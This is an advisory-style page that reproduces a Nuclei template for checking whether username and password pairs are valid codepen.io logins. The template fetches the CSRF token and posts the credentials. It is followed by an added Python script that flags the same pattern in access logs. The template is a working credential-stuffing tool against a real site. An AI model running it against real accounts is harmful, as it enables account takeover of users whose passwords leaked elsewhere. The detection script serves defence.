codepen-login-check: codepen.io Login Check

Date: 2025-08-01 | Affected software: codepen.io | PoC: public

Vulnerability description

Checks for a valid codepen account.

PoC code [public]

id: codepen-login-check

info:
  name: codepen.io Login Check
  author: parthmalhotra,pdresearch
  severity: critical
  description: Checks for a valid codepen account.
  reference:
    - https://owasp.org/www-community/attacks/Credential_stuffing
  metadata:
    max-request: 2
  tags: creds-stuffing,login-check,cloud,codepen,vuln

self-contained: true

http:
  - raw:
      - |
        GET https://codepen.io/login HTTP/1.1
        Host: codepen.io
      - |
        POST https://codepen.io/login/login HTTP/1.1
        Host: codepen.io
        Content-Type: application/x-www-form-urlencoded
        X-CSRF-Token: {{token}}

        authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage

    extractors:
      - type: dsl
        dsl:
          - username
          - password

      - type: xpath
        part: body
        xpath:
          - '//input[@name="authenticity_token"]/@value'
        name: token
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        negative: true
        words:
          - 'The username or password you entered is incorrect, please try again.'

      - type: status
        status:
          - 302
# digest: 4a0a00473045022016f5fd8f18542d0ddd93684d7cd69901f089c2e2950a384f04c1bf6287f57ad50221008253ef5d9e0e2ed653fd7d78e7ab566ee30f6a4a7b5b13eef9533d4fade2da87:922c64590222798bb761d5b6d8e72950
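An added defender-side example, not part of the template above or its authors' code: the template drives a GET /login followed by a POST /login/login for each credential pair and treats a 302 as a valid login, so the same pattern is visible to the target in its web server access log. The script below flags source IPs with many POSTs to /login/login and a low 302 ratio; the log lines, log format and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in Combined Log Format (not real codepen.io traffic).
# 10.0.0.5 behaves like the template: GET /login, then POST /login/login, repeated
# per credential pair, with the 302 that the template treats as a valid login being rare.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /login HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "POST /login/login HTTP/1.1" 200 4871
10.0.0.5 - - [01/Aug/2025:10:00:02 +0000] "GET /login HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2025:10:00:02 +0000] "POST /login/login HTTP/1.1" 200 4871
10.0.0.5 - - [01/Aug/2025:10:00:03 +0000] "GET /login HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2025:10:00:03 +0000] "POST /login/login HTTP/1.1" 302 0
10.0.0.5 - - [01/Aug/2025:10:00:04 +0000] "GET /login HTTP/1.1" 200 5120
10.0.0.5 - - [01/Aug/2025:10:00:04 +0000] "POST /login/login HTTP/1.1" 200 4871
192.0.2.10 - - [01/Aug/2025:10:00:07 +0000] "GET /login HTTP/1.1" 200 5120
192.0.2.10 - - [01/Aug/2025:10:00:15 +0000] "POST /login/login HTTP/1.1" 302 0
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, method, path, status) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return (m["ip"], m["method"], m["path"], int(m["status"])) if m else None

def find_login_check_sources(lines, min_posts=4, max_success_ratio=0.5):
    """Per source IP, count POST /login/login attempts and how many were answered with 302
    (the template's success signal). Flag IPs with many attempts and a low success ratio:
    a legitimate user rarely fails several logins in a row, a credential list almost always does."""
    posts, redirects = defaultdict(int), defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec
        if method == "POST" and path == "/login/login":
            posts[ip] += 1
            if status == 302:
                redirects[ip] += 1
    flagged = {}
    for ip, n in posts.items():
        ratio = redirects[ip] / n
        if n >= min_posts and ratio <= max_success_ratio:
            flagged[ip] = {"attempts": n, "successes": redirects[ip], "success_ratio": ratio}
    return flagged
```

The thresholds are deliberately low so the constructed sample trips them; on a real site, tune `min_posts` and the ratio against the normal failure rate of /login/login, and pair the alert with rate limiting or CAPTCHA on that endpoint.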
